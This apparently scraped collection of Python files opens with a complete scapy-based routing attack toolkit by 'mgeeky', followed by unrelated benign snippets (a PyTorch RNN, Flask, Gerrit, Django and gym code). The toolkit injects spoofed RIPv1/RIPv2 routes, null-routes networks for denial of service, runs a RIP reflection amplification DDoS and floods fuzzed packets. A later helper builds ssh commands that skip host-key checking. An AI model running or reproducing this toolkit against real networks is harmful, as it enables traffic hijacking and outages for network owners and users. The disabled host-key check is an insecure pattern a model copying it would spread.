# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <[email protected]>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
if not 'attack' in args:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
py | 1a4fb501b9eed53c13f1ec93f89d8f9309f80972 | import torch
import torch.nn as nn
from torch.autograd import Variable
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, output_size, n_layers=1):
super(RNN, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.encoder = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, n_layers)
self.decoder = nn.Linear(hidden_size, output_size)
def forward(self, input, hidden):
input = self.encoder(input.view(1, -1))
output, hidden = self.gru(input.view(1, 1, -1), hidden)
output = self.decoder(output.view(1, -1))
return output, hidden
def init_hidden(self):
return Variable(torch.zeros(self.n_layers, 1, self.hidden_size))
|
py | 1a4fb52806094dbbf1f0f6a75d4b679e9fffc5e3 | import sys
A = sys.stdin.readline()[:-1]
stack = []
for ch in A:
if ch == ')':
temp = 0
while stack:
val = stack.pop()
if val == '(':
if temp == 0:
stack.append(2)
else:
stack.append(2 * temp)
break
elif val == '[':
print(0)
exit(0)
else:
temp += int(val)
elif ch == ']':
temp = 0
while stack:
val = stack.pop()
if val == '[':
if temp == 0:
stack.append(3)
else:
stack.append(3 * temp)
break
elif val == '(':
print(0)
exit(0)
else:
temp += val
else:
stack.append(ch)
if not '(' in stack and not '[' in stack:
print(sum(stack))
else:
print(0)
|
py | 1a4fb556da92d389c93bab7d62247a140ba17fcc | import json
from flask import abort, Response
from api.defect_prediction import DefectPredictor
import random # TODO remove after imiplementing classify()
def classify(script):
"""
This function responds to a request for /api/classification/classify (POST)
with the result of a classification on the passed script
:return: a boolean indicating whether the script has been detected has defective (true) or not )(false).
"""
dp = DefectPredictor(script)
if not dp.isValid:
abort(Response({'Not a valid yaml file.'}, 400))
# Check empty file (note: empty files are valid yaml files)
if dp.isEmpty:
abort(Response({'Empty file.'}, 400))
is_defective = dp.classify()
result = {
"defective": is_defective,
"metrics": dp.ansible_metrics
}
return result, 200 |
py | 1a4fb55d57cf94dcda50232c77558424d70e980c | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A Mesos-customized entry point to the thermos_observer webserver."""
import time
from twitter.common import app
from twitter.common.exceptions import ExceptionalThread
from twitter.common.log.options import LogOptions
from twitter.common.quantity import Amount, Time
from apache.aurora.executor.common.path_detector import MesosPathDetector
from apache.thermos.observer.http.configure import configure_server
from apache.thermos.observer.task_observer import TaskObserver
app.add_option(
'--mesos-root',
dest='mesos_root',
type='string',
default=MesosPathDetector.DEFAULT_MESOS_ROOT,
help='The mesos root directory to search for Thermos executor sandboxes [default: %default]')
app.add_option(
'--port',
dest='port',
type='int',
default=1338,
help='The port on which the observer should listen.')
app.add_option(
'--polling_interval_secs',
dest='polling_interval_secs',
type='int',
default=int(TaskObserver.POLLING_INTERVAL.as_(Time.SECONDS)),
help='The number of seconds between observer refresh attempts.')
# Allow an interruptible sleep so that ^C works.
def sleep_forever():
while True:
time.sleep(1)
def initialize(options):
path_detector = MesosPathDetector(options.mesos_root)
polling_interval = Amount(options.polling_interval_secs, Time.SECONDS)
return TaskObserver(path_detector, interval=polling_interval)
def main(_, options):
observer = initialize(options)
observer.start()
root_server = configure_server(observer)
thread = ExceptionalThread(target=lambda: root_server.run('0.0.0.0', options.port, 'cherrypy'))
thread.daemon = True
thread.start()
sleep_forever()
LogOptions.set_stderr_log_level('google:INFO')
app.main()
|
py | 1a4fb5baa63283d21999247305195c72aa5462b9 | #
# Copyright (c) 2010 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def create_password_login_command(user, host):
"""
Create an ssh command line.
"""
cmd = 'ssh'
cmd += ' -oPreferredAuthentications=password'
cmd += ' -oStrictHostKeyChecking=no'
cmd += ' %s@%s' % (user, host)
return cmd
|
py | 1a4fb61060ba7b7c5a7e67c154fd37291a36333e | #!/usr/bin/python3
def safe_print_list(my_list=[], x=0):
i = 0
for j in range(0, x):
try:
print(my_list[j], end='')
i = i + 1
except:
break
print()
return i
|
py | 1a4fb645aeb50d7520afc12cbaeb5bac8a9f9d2c | from prefect import Flow
from prefect.executors import LocalExecutor
from getLastProcess import GetLastProcess
with Flow("Camara_Bot_Flow") as flow:
get_last_process_task = GetLastProcess()
flow.add_task(get_last_process_task)
result1 = get_last_process_task.run()
state = flow.run()
assert state.is_successful()
flow.register(project_name="second")
|
py | 1a4fb76f9790faec4a2d65002c4ebd6e171a9b75 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Jialiang Shi
from gerrit.utils.models import BaseModel
class Message(BaseModel):
def __init__(self, **kwargs):
super(Message, self).__init__(**kwargs)
self.attributes = [
"id",
"_revision_number",
"message",
"date",
"author",
"real_author",
"tag",
"change",
"gerrit",
]
def delete(self, input_=None):
"""
Deletes a change message.
Note that only users with the Administrate Server global capability are permitted to delete a change message.
.. code-block:: python
input_ = {
"reason": "spam"
}
change = gerrit.changes.get('myProject~stable~I10394472cbd17dd12454f229e4f6de00b143a444')
message = change.messages.get("babf4c5dd53d7a11080696efa78830d0a07762e6")
result = message.delete(input_)
# or
result = message.delete()
:param input_: the DeleteChangeMessageInput entity,
https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html#delete-change-message-input
:return:
"""
if input_ is None:
endpoint = "/changes/%s/messages/%s" % (self.change, self.id)
self.gerrit.requester.delete(self.gerrit.get_endpoint_url(endpoint))
else:
endpoint = "/changes/%s/messages/%s/delete" % (self.change, self.id)
base_url = self.gerrit.get_endpoint_url(endpoint)
response = self.gerrit.requester.post(
base_url, json=input_, headers=self.gerrit.default_headers
)
result = self.gerrit.decode_response(response)
change = self.gerrit.changes.get(self.change)
return change.messages.get(result.get("id"))
class Messages(object):
def __init__(self, change, gerrit):
self.change = change
self.gerrit = gerrit
def list(self):
"""
Lists all the messages of a change including detailed account information.
:return:
"""
endpoint = "/changes/%s/messages" % self.change
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse_list(result, change=self.change, gerrit=self.gerrit)
def get(self, id_):
"""
Retrieves a change message including detailed account information.
:param id_: change message id
:return:
"""
endpoint = "/changes/%s/messages/%s" % (self.change, id_)
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse(result, change=self.change, gerrit=self.gerrit)
|
py | 1a4fb7a60a704561cbf2ed006c567da3a6b04c1b | from __future__ import absolute_import, print_function
import typing
import gym
from core import Action
from graphic import CursesSnake
class SnakeEnv(gym.Env):
"""
0 -> go straight
1 -> turn left
2 -> turn right
"""
action_space = [0, 1, 2]
def __init__(self, shape: [typing.List[int], typing.Tuple[int, int]] = (4, 4)):
self.shape = shape
self.curses_snake: CursesSnake = ...
action_space = Action
up, down, left, right, none = (action_space.UP, action_space.DOWN, action_space.LEFT,
action_space.RIGHT, action_space.NONE)
self.direction_env_action_to_game_action: typing.Dict[int, typing.List[int]] = {
up: [none, left, right],
down: [none, right, left],
left: [none, down, up],
right: [none, up, down]
}
self.reset()
def reset(self) -> typing.List[typing.List[int]]:
self.curses_snake = CursesSnake(self.shape)
return self.curses_snake.snake.game_board.data
def render(self, mode='human') -> None:
self.curses_snake.render()
def step(self, action: int) -> (typing.List[typing.List[int]], float, bool, typing.Any):
return self.curses_snake.snake.step(
self.direction_env_action_to_game_action[
self.curses_snake.snake.snake.direction][action])
def close(self):
self.curses_snake.close()
def seed(self, seed=None):
pass
|
py | 1a4fb9961ce2f6d53f2cb8e76b696f1dbc4cf05e | # Create your views here.
from django import forms, http
from django.http import Http404, HttpResponse
from django.views.generic import ListView, View, CreateView, FormView, UpdateView
from django.views.generic.base import TemplateView
from django.http import HttpResponseRedirect
from core.views import AuthorizedOrganizationMixin, AuthorizedOrganizationEditMixin, ConfirmationObjectView
from django.utils import simplejson
from core.views import PathMixin
from django.core.urlresolvers import reverse
from braces.views import LoginRequiredMixin
from django.template.defaultfilters import slugify
from experiment.forms import ExperimentManualForm, ExperimentAddForm
from protocols.models import Protocol, Step, Action, Thermocycle, Machine, Component
from organization.models import Organization
from schedule.models import Calendar
from experiment.models import Experiment
from protocols.utils import VERB_CHOICES, VERB_FORM_DICT
from workflow.models import Workflow
class ExperimentSetupMixin(PathMixin):
pathEnd = {}
titleMarks = {'suffix':"",'prefix':""}
def get_context_data(self, **kwargs):
context = super(ExperimentSetupMixin, self).get_context_data(**kwargs)
experiment_slug = self.kwargs.get('experiment_slug', None)
prefix = self.titleMarks['prefix']
suffix = self.titleMarks['suffix']
title = ""
if experiment_slug:
context['experiment'] = self.request.user.experiment_set.get(slug=experiment_slug)
context['organization'] = context['experiment'].owner
context['workflow'] = context['experiment'].workflow
else:
owner_slug = self.kwargs.get('owner_slug', None)
if owner_slug:
context['organization'] = self.request.user.organization_set.get(slug=owner_slug)
if 'organization' in context:
context['paths'].append({'name':context['organization'].name, 'url':context['organization'].get_absolute_url()})
title = context['organization'].name
if 'experiment' in context:
context['paths'].append({'name':context['experiment'].name, 'url':context['experiment'].get_absolute_url()})
prefix = title
title = context['experiment'].name
if self.pathEnd:
context['paths'].append( self.pathEnd )
suffix = self.pathEnd['name']
else:
del(context['paths'][-1]['url'])
if title:
context['titleBlock'] = {'prefix':prefix, 'title':title, 'suffix':suffix}
return context
class ExperimentDetailView(ExperimentSetupMixin, LoginRequiredMixin, TemplateView):
model = Experiment
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_detail.html"
def get_context_data(self, **kwargs):
context = super(ExperimentDetailView, self).get_context_data(**kwargs)
return context
class ExperimentUpdateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'Edit'}
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
slug = self.kwargs.get('experiment_slug', None)
exp = self.request.user.experiment_set.get(slug=slug)
oldWorkflow = exp.workflow
oldName = exp.name
exp.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
